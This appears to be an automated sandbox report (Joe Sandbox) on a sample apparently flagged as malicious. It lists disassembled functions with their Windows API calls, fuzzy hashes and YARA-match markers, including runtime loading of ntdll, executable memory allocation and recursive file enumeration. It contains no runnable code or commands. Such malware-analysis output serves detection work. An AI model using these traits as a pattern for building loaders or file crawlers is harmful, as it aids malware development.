Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: Library$CreateFreeLoadObjectSingleThreadWait
String ID:
API String ID: 2432312608-0
Opcode ID: f2930e022828b0519e15a44364090fc36355b0a297037990825cb228e26a18c0
Instruction ID: ed88dbe67b5c764a5a5d7f0623851e1bb293c2dc1ba7a172eea71f9419d1bb47
Opcode Fuzzy Hash: f2930e022828b0519e15a44364090fc36355b0a297037990825cb228e26a18c0
Instruction Fuzzy Hash: 3F016D719803189BDB64CF54DC8CBA97734FB08715F1046C8E6195A2A1CAB96A80CF54

Function 038F3508 Relevance: 6.0, APIs: 4, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CriticalHeapSection$AllocateEnterLeaveProcess
String ID:
API String ID: 1367039788-0
Opcode ID: 7b793b13c9e0bbdbd84cef4c159e376889ff43729a7b3b52047eae6ea8ec640e
Instruction ID: 7645376029e490e513d3c92fcb0fb97ee24158d5b133ef12214d08b5d699b43d
Opcode Fuzzy Hash: 7b793b13c9e0bbdbd84cef4c159e376889ff43729a7b3b52047eae6ea8ec640e
Instruction Fuzzy Hash: E3D09E336005606FEB5036E9B80CD9BAAACEFD57A171500DAF205C3154CAA4880587A0

Function 038F46D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,038F4812), ref: 038F46E6
LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,038F4812), ref: 038F46F3

Strings

ntdl, xrefs: 038F46E1, 038F46F2

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: ntdl
API String ID: 4133054770-3973061744
Opcode ID: a763937f858b2a392e54e1fad7fd3ac0e981d8cc6b7473b4b9f8970ef07e4d89
Instruction ID: 30e323f6751529466a5fe35c17b98359ed2efafc5d108ed4fcc54c5e05f737a8
Opcode Fuzzy Hash: a763937f858b2a392e54e1fad7fd3ac0e981d8cc6b7473b4b9f8970ef07e4d89
Instruction Fuzzy Hash: 3E319939E046199FCB24CFAAC490ABEF7B5BF4A314F08029AD611E7341C735A951CBA0

Function 007DEDE2 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 007DEF97

Part of subcall function 007DAC15: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,007CFB1F,00000000,?,0078322C,00000000,?,007713A5,00000000), ref: 007DAC47

__freea.LIBCMT ref: 007DEFAA
__freea.LIBCMT ref: 007DEFB7

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: __freea$AllocateHeap
String ID:
API String ID: 2243444508-0
Opcode ID: 03cb9808f2efb27eba89e5d14468f7eb4d84a7e059c639d548791a869709002e
Instruction ID: dccf6bd6e6c5e15b3e6471ec625736c893e751a6e0c36d077805641b672ef3e1
Opcode Fuzzy Hash: 03cb9808f2efb27eba89e5d14468f7eb4d84a7e059c639d548791a869709002e
Instruction Fuzzy Hash: AB51837260020AAFEB26AF61DC45EAF7BB9EF44710F15012AFD08DE341E779DC5086A1

Function 007E2F61 Relevance: 3.2, APIs: 2, Instructions: 177COMMON

Download Yara Rule

APIs

Part of subcall function 007E2A95: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 007E2AC0

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,007E2DA5,?,00000000,?,00000000,?), ref: 007E2FC2
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,007E2DA5,?,00000000,?,00000000,?), ref: 007E2FFE

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 8ddd35358b8d7adcbf6ce00907e1b4c9fd636295e0116f9725f16ec6301f1391
Instruction ID: 2c654476867b22b0e24ffcbc2e7617b20e3672d35c907d7b2754083d74cf204b
Opcode Fuzzy Hash: 8ddd35358b8d7adcbf6ce00907e1b4c9fd636295e0116f9725f16ec6301f1391
Instruction Fuzzy Hash: 4B512870A017C59EDB20CF37C8896BABBF5FF48300F14856ED0968B252E67D9646CB50

Function 007DE1D3 Relevance: 3.0, APIs: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringEx.KERNELBASE(?,007DEED2,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 007DE207
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,007DEED2,?,?,-00000008,?,00000000), ref: 007DE225

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: f1bc6162362988bcaf7b2c1e2206d432c0fb3cb4b2faf3a1b3bbdcbb9e9cadb5
Instruction ID: 40915b07663caab3b1fae5a2d68e270af20627baf782b3e7fe1e048ecad31851
Opcode Fuzzy Hash: f1bc6162362988bcaf7b2c1e2206d432c0fb3cb4b2faf3a1b3bbdcbb9e9cadb5
Instruction Fuzzy Hash: 32F0683200055AFBCF236F90DC09DDE3E2AFB48760F058416FA182A120C63AD831AB94

Function 038F3536 Relevance: 3.0, APIs: 2, Instructions: 8memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,038F518A), ref: 038F353D
RtlFreeHeap.NTDLL(00000000), ref: 038F3544

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 859f970d10bbb1f9e9dd3a19ffe2186af6e26e60d859a26f5b4fa8ec5e4298bd
Instruction ID: 14e22cbd2c66dda3fb1f2504602a8256aa325411a6dda6d1b9826cb6bd474bf8
Opcode Fuzzy Hash: 859f970d10bbb1f9e9dd3a19ffe2186af6e26e60d859a26f5b4fa8ec5e4298bd
Instruction Fuzzy Hash: AFB092745015006FFE486BE0991DF3A3618FF84743F1400C8F202D104486A880108620

Function 007E2B69 Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(FFFFF9B2,?,00000005,007E2DA5,?), ref: 007E2B9B

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: e8949f8726e5da0eecaa822ca6b6b92085a76226aa64e04332607ab04a0fd7c1
Instruction ID: d02df1cf2ba96dea740d1dd3ea53bce570e31d0f0e900a4c23acdf13520f1a12
Opcode Fuzzy Hash: e8949f8726e5da0eecaa822ca6b6b92085a76226aa64e04332607ab04a0fd7c1
Instruction Fuzzy Hash: D4518AB0909198AADB118F29CC84BF9BB7CFB19304F2401E9E189C7153D339AD86DB70

Function 007CFB05 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

stdext::threads::lock_error::lock_error.LIBCPMTD ref: 007D037B

Part of subcall function 007D106C: RaiseException.KERNEL32(E06D7363,00000001,00000003,007D038E,?,?,?,?,007D038E,?,007F8484), ref: 007D10CC

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionRaisestdext::threads::lock_error::lock_error
String ID:
API String ID: 3447279179-0
Opcode ID: 8384a2509de4622fc921ad8ed7772f6444f8ea7cbf2dbdd1d141a5043fde302d
Instruction ID: d7ce49c0c845047d12c35c35cb8ef742e97244a98eac0e34fa0de6f867e83494
Opcode Fuzzy Hash: 8384a2509de4622fc921ad8ed7772f6444f8ea7cbf2dbdd1d141a5043fde302d
Instruction Fuzzy Hash: ACF090B480060DF7CB04BAB4EC1EEAD373D9900350F50812AF968961A2EB38EA488195

Function 00771460 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 00771477

Part of subcall function 00783D80: stdext::threads::lock_error::lock_error.LIBCPMTD ref: 00783D89

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstdext::threads::lock_error::lock_error
String ID:
API String ID: 2103942186-0
Opcode ID: 7e938961fb2e67025cdff9c0a0f1d748bbed45857ce640becdc6d9bdc5e37106
Instruction ID: 164e139cc3b30f6d7862417887f2dc2e128662e5575c3d00aa7f753da1bf20b6
Opcode Fuzzy Hash: 7e938961fb2e67025cdff9c0a0f1d748bbed45857ce640becdc6d9bdc5e37106
Instruction Fuzzy Hash: 2FF01974E01148EBCF14EFACD485AADB7B1AF44344F50C1A9E80997345E638AF508B81

Function 007DAC15 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?,?,007CFB1F,00000000,?,0078322C,00000000,?,007713A5,00000000), ref: 007DAC47

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 37c6a7564f3007180ea2d20c8bcf6f2e751dd62f5dae23e52854370b5396ec12
Instruction ID: 91510c59bc4114c6ad67a371463e1281669f2c05e02b200c79e6229499258f72
Opcode Fuzzy Hash: 37c6a7564f3007180ea2d20c8bcf6f2e751dd62f5dae23e52854370b5396ec12
Instruction Fuzzy Hash: 07E0E521524A15B7DB3127259C047AA3BB8BB423B0F184163BD0C963D0DB6CCC0082B6

Function 007A7B09 Relevance: 1.5, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,00000007,?,?), ref: 00784B9E

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6061fd8eea1d719377fcf9b0fbf558367b55350db4711521b37e099575ea4def
Instruction ID: a49845cf35b8ac5086a3c4d1caaafba739a4370250a43b79f1f95e0bad53f14d
Opcode Fuzzy Hash: 6061fd8eea1d719377fcf9b0fbf558367b55350db4711521b37e099575ea4def
Instruction Fuzzy Hash: 9DD012F6A55109C7CB209B68EC483B27B78F704316B145199EA5847202EF7A45158F44

Function 007713B0 Relevance: 1.5, APIs: 1, Instructions: 9COMMONLIBRARYCODE

Download Yara Rule

APIs

allocator.LIBCONCRTD ref: 007713BC

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: allocator
String ID:
API String ID: 3447690668-0
Opcode ID: 571f10d42482652b194d7ecda06d937b3b08c569b6719ab49de57ad63638ba45
Instruction ID: f2b8a1dc4d5ec09757dc4e46f032116986bcdf9f12507df698abde4ff19ccee2
Opcode Fuzzy Hash: 571f10d42482652b194d7ecda06d937b3b08c569b6719ab49de57ad63638ba45
Instruction Fuzzy Hash: 41C09B7015410C9B8704EF88E491D55779D9B887107004155BC0D4B351DA70FD40C654

Function 038F407D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(038F5051,038F447E,?,?,?,?,?,?,?,?,?,?,?,?,?,038F3ECC), ref: 038F407E

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a8afc92646b5656e4bcf3863a2296cda612acbef95964597b5bac4e55f55bb89
Instruction ID: 99557c7f3b7f28a1d3a6c8f0f1987ac91084018e1562be5fafb5dfd894dfc8d4
Opcode Fuzzy Hash: a8afc92646b5656e4bcf3863a2296cda612acbef95964597b5bac4e55f55bb89
Instruction Fuzzy Hash: 42A02238030A008FCA2C23300F2A80E30008E8A3F03220BCCF033C80C0FA28C2800000

Function 00797EEA Relevance: 1.3, APIs: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 00788B81

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d08317e1e5fabe19db3e649bd06056583305878db7c631b6c08e147d6820267c
Instruction ID: ba949bd53a85069fe17f5ab8653c5c3bf59bd47fc80f6a9f9b1d60294a9b5261
Opcode Fuzzy Hash: d08317e1e5fabe19db3e649bd06056583305878db7c631b6c08e147d6820267c
Instruction Fuzzy Hash: A42114B1C05A68CBDBA2DF24CD857ADB7B5AF86340F5092C6D40D6A202DB389BC1CF11

Non-executed Functions

Function 007E5458 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,jW~,00000002,00000000,?,?,?,007E576A,?,00000000), ref: 007E54F1
GetLocaleInfoW.KERNEL32(?,20001004,jW~,00000002,00000000,?,?,?,007E576A,?,00000000), ref: 007E551A
GetACP.KERNEL32(?,?,007E576A,?,00000000), ref: 007E552F

Strings

jW~, xrefs: 007E550B, 007E5528, 007E54E2, 007E54FB, 007E54E5, 007E550E
OCP, xrefs: 007E54AC
ACP, xrefs: 007E5476

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP$jW~
API String ID: 2299586839-761902356
Opcode ID: cc1e72f8b811b6cabf996003f939cd94571c51b55aede2483e36864cedd3d1b7
Instruction ID: 4ff34a1851dc1fa0d6b2c3f48e62089700c9d25d6900dc1bd79fe6cfd90509b6
Opcode Fuzzy Hash: cc1e72f8b811b6cabf996003f939cd94571c51b55aede2483e36864cedd3d1b7
Instruction Fuzzy Hash: 0A2108326025C9E6D7308F57D905B9773B7AB5CB2DB668424E909CB144F73ADE40C350

Function 038F3EFC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

Part of subcall function 038F407D: GetFileAttributesW.KERNELBASE(038F5051,038F447E,?,?,?,?,?,?,?,?,?,?,?,?,?,038F3ECC), ref: 038F407E

Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 038F3F5D
FindNextFileW.KERNEL32(038F1710,?), ref: 038F3FFE

Strings

%s%s, xrefs: 038F4047
%s\%s, xrefs: 038F3F97
%s\*, xrefs: 038F3F47

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: File$CriticalFindHeapSection$AllocateAttributesEnterFirstLeaveNextProcess
String ID: %s%s$%s\%s$%s\*
API String ID: 674214967-2064654797
Opcode ID: 7b1fdf839e5d279df7798f349e3379b5504bb7aa9e542aec2a8d328b052037e8
Instruction ID: 4ee7376b7c6f01b89ed2095806298d5f68f86ee9795c7ec3cf453c881b005367
Opcode Fuzzy Hash: 7b1fdf839e5d279df7798f349e3379b5504bb7aa9e542aec2a8d328b052037e8
Instruction Fuzzy Hash: E531F779A003196FDB21EAE98C44ABEB765DFC0250F0801E5EE05DB290DB758F45CB52

Function 007E5634 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 007E573C
IsValidCodePage.KERNEL32(00000000), ref: 007E577A
IsValidLocale.KERNEL32(?,00000001), ref: 007E578D
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 007E57D5
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 007E57F0

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: ac2b8a6fdc16c7525d2148ae1884da4cf01fb9ea7beea5d953d466ba2cdb9548
Instruction ID: 6ea593f107ac4d69b33f4ca6b1cbecefacc11bfc4c224af242cc24f537a3fa3f
Opcode Fuzzy Hash: ac2b8a6fdc16c7525d2148ae1884da4cf01fb9ea7beea5d953d466ba2cdb9548
Instruction Fuzzy Hash: 8F518271A0268DEBDB20DFA6CC45BAE77B8BF0C704F544429E910EB191EB78D940CB61

Function 007E4CBF Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007DA8F0: GetLastError.KERNEL32(?,?,007D71B7,?,?,?,?,00000003,007D4382,?,007D42F1,?,00000000,007D4500), ref: 007DA8F4
Part of subcall function 007DA8F0: SetLastError.KERNEL32(00000000,00000000,007D4500,?,?,?,?,?,00000000,?,?,007D459E,00000000,00000000,00000000,00000000), ref: 007DA996

GetACP.KERNEL32(?,?,?,?,?,?,007D89B1,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 007E4D7E
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,007D89B1,?,?,?,00000055,?,-00000050,?,?), ref: 007E4DB5
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 007E4F18

Strings

utf8, xrefs: 007E4E87

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: df731c5f1a0de6bb4b1bd518e3b195c2a483da851788f47e89adb0d167cb25b5
Instruction ID: e75ee3abd6742a2807606661431848403c63d7c73eca9220b5bfc1331db187ed
Opcode Fuzzy Hash: df731c5f1a0de6bb4b1bd518e3b195c2a483da851788f47e89adb0d167cb25b5
Instruction Fuzzy Hash: F7711971A02286EADB35EB76DC46BB773A8FF4C700F14402AFA05DB181EA7CED408655

Function 038F40BA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 038F410D
FindNextFileW.KERNEL32(000000FF,?), ref: 038F4159

Part of subcall function 038F3536: GetProcessHeap.KERNEL32(00000000,00000000,038F518A), ref: 038F353D
